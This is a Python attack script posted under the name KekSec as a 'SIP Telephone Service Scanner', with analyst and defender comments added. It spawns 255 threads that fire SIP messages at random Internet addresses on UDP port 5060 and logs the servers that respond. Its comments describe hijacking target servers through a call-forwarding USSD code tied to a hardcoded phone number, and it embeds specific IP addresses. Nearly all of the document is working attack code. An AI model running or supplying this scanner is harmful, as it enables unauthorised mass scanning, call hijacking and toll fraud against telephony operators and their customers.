KekSec

SIP Telephone Service ScAnNeR

May 31st, 2019
  1. import socket
  2. import random
  3. import select
  4. import threading
  5. import time
  6.  
  # Analyst note: module-level settings for the probe. findReplace() substitutes
  # these literals into the message templates, so they may appear verbatim in the
  # traffic this script sends. The templates themselves are not part of this
  # listing, so confirm against a capture before using them as detection strings.
  7. #IP data
  8. servip="9.39.195.80" #reuse ipaddr for target sip server in order to hijack
  9. myip="70.67.16.106"
  10. port=5060 #used as the local bind port and as the destination port of every probe
  11.  
  12. #INVITE data
  13. name="James"
  14. nameto="Herbert"
  15. phoneno="*61*16043308323#" #hijack via call forwarding USSD code
  16.  
  17. #REGISTER data
  18. enableregister=0 #enable registering but most servers no longer support it
  19. username="SELFCHECK" #default username
  20. realm="asterisk" # default www authentication realm
  21.  
  22. #SIP data
  # Session-description body; the PHONENO and MYIP placeholders are filled in
  # later, when findReplace() is applied to this string.
  23. sipdata="v=0\no="+nameto+" PHONENO PHONENO IN IP4 MYIP\ns=-\nc=IN IP4 MYIP\nt=0 0\nm=audio 49172 RTP/AVP 0\na=rtpmap:0 PCMU/8000\nport="+str(port)
  24.  
  25. #timeout and rate limiting options
  26. timeout=0.3 #seconds passed to select() in recvDatShiz, i.e. 300 ms
  27. ratelimit=0 #seconds slept by scanThread after a reply has been logged
  28.  
  # Fill the upper-case placeholders of a message template with the module-level settings.
  #   data: template text containing placeholders such as SIPDATA, PHONENO, MYIP, SERVIP, IPADDR.
  #   ip:   address substituted for IPADDR (the probed host when called from scanThread).
  # Returns the template with each placeholder replaced through plain str.replace();
  # no escaping or validation is applied. CONTLEN becomes len(sipdata), a character count.
  29. def findReplace(data, ip):
  30.     return data.replace("SIPDATA", sipdata).replace("PHONENO", phoneno).replace("MYIP", myip).replace("SERVIP", servip).replace("IPADDR", ip).replace("PHONENO", phoneno).replace("CONTLEN", str(len(sipdata))).replace("PORT", str(port)).replace("NAME", name).replace("NAMTO", nameto).replace("USER", username).replace("REALM" ,realm)
  # Resolve the placeholders inside the session-description body itself.
  31. sipdata=findReplace(sipdata, servip)
  32. #open sip data file for reading
  # Two message templates are read from fixed paths; their contents are not shown in
  # this listing. scanThread sends fdata1 only when enableregister is set and fdata2
  # on every iteration.
  # NOTE(review): the /sdcard prefix suggests the script was run on an Android device; unconfirmed.
  33. f=open("/sdcard/SIPSCAN1.txt", "r")
  34. fdata1=f.read()
  35. f.close()
  36. f=open("/sdcard/SIPSCAN2.txt", "r")
  37. fdata2=f.read()
  38. f.close()
  39.  
  # One UDP socket, bound to every local interface on `port`, is shared by all scan
  # threads, so the probes leave with source port 5060 as well as destination port 5060.
  40. s=socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
  41. s.bind(("", port))
  42.  
  # Wait up to `timeout` seconds for one datagram on socket s.
  # Returns (data, addr) from recvfrom(4096) when the socket becomes readable.
  # In every other case, including any exception, it returns the sentinel (b'', '0.0.0.0').
  43. def recvDatShiz(s):
  44.     try:
  45.         s.setblocking(0)
  46.         ready = select.select([s], [], [], timeout)
  47.         if ready[0]:
  48.             data, addr = s.recvfrom(4096)
  49.             return data, addr
  50.     except:
              # bare except: every error is swallowed and reported to the caller as "no reply"
  51.         pass
  52.     return b'', '0.0.0.0'
  # Record a host whose reply contains b"100 ", b"200 " or b"180 " anywhere in the datagram.
  # 100 Trying, 180 Ringing and 200 OK are SIP status codes; the test is a substring match,
  # not a parse of the status line.
  # Side effects: prints the raw reply and the address, and appends the address to /sdcard/sip.txt.
  # Returns data unchanged.
  # Analyst note: /sdcard/sip.txt is the script's results file, one address per line.
  53. def dataCheck(data, ip):
  54.     if data!=b'':
  55.         if b"100 " in data or b"200 " in data or b"180 " in data: # check for auth or ringing
  56.             print(data)
  57.             print(ip)
  58.             f=open("/sdcard/sip.txt", "a")
  59.             f.write(ip+"\n")
  60.             f.close()
  61.     return data
  # Worker loop: pick a random IPv4 address, send the template(s) to it over UDP on `port`,
  # and pass any reply that is not filtered out to dataCheck() for logging.
  #   fdata1: template sent first, only when enableregister is truthy.
  #   fdata2: template sent on every iteration.
  # Never returns (while 1).
  # Defender note: what a target sees is an unsolicited UDP datagram to port 5060 from an
  # unknown source. SIP endpoints that do not need Internet exposure should not be reachable
  # on that port, and exposed ones should require authentication before acting on a request.
  62. def scanThread(fdata1, fdata2):
  63.     while 1:
              # first octet is 1..222, the other three are 0..254 (randrange excludes the upper bound)
  64.         ip=str(random.randrange(1,223))+"."+str(random.randrange(0,255))+"."+str(random.randrange(0,255))+"."+str(random.randrange(0,255))
              # string-prefix filter: skips every address whose first octet is 127, 192, 172 or 10
  65.         if ip.startswith("0") or ip.startswith("127") or ip.startswith("192") or ip.startswith("172") or ip.startswith("10."):
  66.             continue
  67.         try:
  68.             if enableregister:
  69.                 s.sendto(findReplace(fdata1, ip).encode(), (ip, port))
  70.                 data, addr = recvDatShiz(s)
  71.                 if b"Unauthorized" in data or b"Illegal" in data or b"404" in data or "480" in data or data==b'':
  72.                     continue
  73.                 dataCheck(data, ip)
  74.             s.sendto(findReplace(fdata2, ip).encode(), (ip, port))
  75.             data, addr = recvDatShiz(s)
  76.             #if data!=b"":
  77.             #    print(data)
                  # replies containing these markers, and timeouts (b''), are discarded without logging
  78.             if b"Unauthorized" in data or b"Illegal" in data or b"404" in data or b"480" in data or data==b'':
  79.                 continue
  80.             dataCheck(data, ip)
  81.         except Exception as e:
  82.             #print(str(e))
  83.             continue
              # reached only when a reply got through the filter above; every `continue` skips it
  84.         time.sleep(ratelimit)
  # Start 255 worker threads (range(0, 255)), all running scanThread with the same two
  # templates and sharing the one module-level socket. The threads are non-daemon and
  # scanThread never returns, so the process runs until it is killed.
  85. for i in range(0, 255):
  86.     threading.Thread(target=scanThread, args=(fdata1,fdata2,)).start()